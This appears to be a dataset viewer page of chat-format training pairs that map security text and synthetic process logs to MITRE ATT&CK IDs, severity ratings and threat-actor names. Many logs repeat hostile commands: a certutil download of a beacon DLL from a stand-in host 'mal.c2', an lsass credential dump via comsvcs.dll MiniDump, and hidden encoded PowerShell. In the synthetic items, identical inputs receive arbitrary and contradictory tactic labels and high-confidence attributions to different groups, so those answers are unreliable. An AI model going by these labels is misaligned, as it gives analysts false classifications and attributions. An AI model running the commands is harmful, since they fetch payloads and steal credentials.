messages listlengths 2 2 |
|---|
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: RTM has also been delivered to targets as various archive files including ZIP, 7-ZIP, and RAR.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027\"]}",
"role": "assistant... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: A number of commands are provided to the attackers, including the ability to download and execute additional information, upload documents of interest, and take screenshots of the desktop",
"role": "user"
},
... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Volgmer deobfuscates its strings and APIs once its executed.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1140\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-HNU47CHBSL)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Reconnaissance, Credential Access",
"role": "user"
},
{
"content"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-Y1PBAKJFYC)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Privilege Escalation",
"role": "user"
},
{
"content": "{\"severity\":... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Avaddon deletes backups and shadow copies using native system tools.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1490\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-M2490CPDIA)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Reconnaissance",
"role": "user"
},
{
"content": "{\"severity\": \"High\"... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Users can interact with ticket storage using kinit, klist, ktutil, and kcc built-in binaries or via Apple's native Kerberos framework.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: OopsIE uses the command prompt to execute commands on the victim's machine.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.003\", \"T1059\"]}",
"role": "assistant"
}
] |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Adversaries may leverage Spearphishing Attachment or Spearphishing Link as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through Input Capture on sites tha... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 2746 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.129.211.244",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-XN0TNL1Z3T)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Execution, Persistence",
"role": "user"
},
{
"content": "{\"s... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 858 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.153.107.193",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0006\", \"TA0010\"], \"t... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-V7HNPB9K5H)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Command and Control",
"role": "user"
},
{
"content": "{\"severity... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: The emond binary at /sbin/emond will load any rules from the /etc/emond.d/rules/ directory and take action once an explicitly defined event takes place.",
"role": "user"
},
{
"content": "{\"tactics\": [\"... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.20.129.103",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\", \"T... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, LOLBin, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typh... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-LGX2ZOEPT2)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Collection, Command and Control, Initial Access",
"role": "user"
},
... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.191.139.87",
"role": "user"
},
{
"content": "{\"tactics\": [\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: LOLBin, TLS, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"confidence\": \"High\"}"... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.1.16.48",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: RTM tries to add a Registry Run key under the name \"Windows Update\" to establish persistence.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1547.001\", \"... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.190.86.127",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0043\",... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 3543 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.123.225.237",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA00... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: TLS, LOLBin, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confi... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2132 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, TLS, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confidence\... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.152.95.81",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\", \"TA0043\"], \"techniqu... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: FinFisher obtains the hardware device list and checks if the MD5 of the vendor ID is equal to a predefined list in order to check for sandbox/virtualized environments.",
"role": "user"
},
{
"content": "{\... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Base64, TLS, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-2YS34RX3Z2)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Execution",
"role": "user"
},
{
"content": "{\"severity\": \"Critical\",... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-244IKXWL3C)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Persistence, Execution, Lateral Movement",
"role": "user"
},
{
"con... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: LOLBin, JA3 Spoof, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered ... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 2324 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.45.236.250",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA001... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Both types of Outlook data files are typically stored in C:\\Users\\<username>\\Documents\\Outlook Files or C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Outlook.",
"role": "user"
},
{
"content": "{\"... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVers... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-25DZXSHOSH)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Impact, Command and Control, Persistence",
"role": "user"
},
{
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, Fileless, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 2825 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.167.225.127",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\"], \"tec... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: When selected, all applications currently open are added to a property list file named com.apple.loginwindow.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1547\", \"T1547.007... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.117.131.110",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1531\"... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, Base64, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"con... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-LQR4I363TE)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Lateral Movement, Discovery, Reconnaissance",
"role": "user"
},
{
... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.137.148.213",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\"], \"techni... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: JA3 Spoof, Fileless, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-U3E0IM8UWX)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Reconnaissance, Execution, Command and Control",
"role": "user"
},
{... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.131.142.3",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA00... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-SEEN66H91W)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Execution, Persistence, Credential Access",
"role": "user"
},
{
"cont... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.50.15.197",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\", \"TA0008\", \"TA0009\"],... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 1436 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.142.105.117",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0005\"], \"techniqu... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: To change the operating system in memory, the adversary typically can use one of two methods.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1601\", \"T1601.001\"]}",
"rol... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-2WNA77DU27)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Defense Evasion, Command and Control",
"role": "user"
},
{
"c... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-ZO2M3HDZOS)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Lateral Movement, Reconnaissance, Collection",
"role": "user"
},
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, Fileless, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes.",
"role": "user"
},
{
"content": "{\"tactics\"... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.189.204.154",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA00... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.190.72.16",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \"TA0003... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-LRGJ6JW25W)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Credential Access, Execution, Reconnaissance",
"role": "user"
},
{
... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: The encoded payload is then made to look like a URI by having a random number of ‘/’ characters inserted at random locations within the encoded payload",
"role": "user"
},
{
"content": "{\"tactics\": [\"T... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.57.6.192",
"role": "user"
},
{
"content": "{\"tactics\": [\"... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Monitor for changes made to AD settings for unexpected modifications to user accounts, such as deletions or potentially malicious changes to user attributes (credentials, status, ).",
"role": "user"
},
{
"conte... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-9V1LV1KOBW)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Defense Evasion",
"role": "user"
},
{
"content": "{\"severity\":... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.15.123.75",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\", \"TA0002\"], \"techni... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\", \"TA0005\"], \"techniques\": [\"T1574.012\", \... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 3683 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.9.66.43",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"te... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, LOLBin, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"conf... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.97.162.16",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\"],... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: The dropped files are either in the root of the “ProgramData” folder or in a subdirectory",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1083\"]}",
"role": "assistant"
}... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: LOLBin, JA3 Spoof, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typho... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, WMI, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\",... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Kimsuky has used tools that are capable of obtaining credentials from saved mail.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1552.001\", \"T1552\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Monitor for abnormal presence of these or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-CBIC55MDU2)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Persistence, Initial Access, Credential Access",
"role": "user"
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-O7ZPIBK925)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Impact",
"role": "user"
},
{
"content": "{\"severity\": \"Crit... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-AYN7MYE9NM)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Privilege Escalation, Defense Evasion",
"role": "user"
},
{
"conten... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.46.99.196",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA000... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: PoetRAT has used HTTP and HTTPs for C2 communications.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1071\", \"T1071.001\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-P8HVI3EA41)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Impact, Execution, Initial Access",
"role": "user"
},
{
"content": "{\"se... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, JA3 Spoof, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spid... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Clop can use msiexec.exe to disable security tools on the system.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1218\", \"T1218.007\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-A74VX4ZKTZ)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Execution",
"role": "user"
},
{
"content": "{\"severity\"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-11FD2N3EQ5)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Reconnaissance, Credential Access, Initial Access",
"role": "user"
},
{
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, TLS, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confiden... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Threat Group-3390 has locally staged encrypted archives for later exfiltration efforts.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1074.001\", \"T1074\"]}",
"role": "assistant"
}... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: PoetRAT has the ability to gather information about the compromised host.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1082\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1105 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, Base64, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confid... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1961 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, WMI, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidenc... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 3867 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.173.47.73",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: LOLBin, TLS, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confidence\": ... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: QakBot can conduct brute force attacks to capture credentials.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1110\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3544 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Base64, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confi... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: AADInternals can enumerate Azure AD users.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1087\", \"T1087.004\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, Base64, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spider\", ... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Wizard Spider has used taskkill.exe and net.exe to stop backup, catalog, cloud, and other services prior to network encryption.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 1215 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.160.146.121",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\", \"TA0005\", \"TA0001\"]... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.12.25.17",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\", \"TA0004\... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: BabyShark has executed the whoami command.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1033\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-IOIBICTWPU)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Impact, Collection, Discovery",
"role": "user"
},
{
"content": ... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Lazarus Group has used multiple types of encryption and encoding for their payloads, including AES, Caracachs, RC4, XOR, Base64, and other tricks such as creating aliases in code for Native API function names.",
"role": "user"
},... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: keylogger) may be missing for these platforms",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\", \"TA0009\"], \"techniques\": [\"T1056\"]}",
"role": "assistant"
}
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.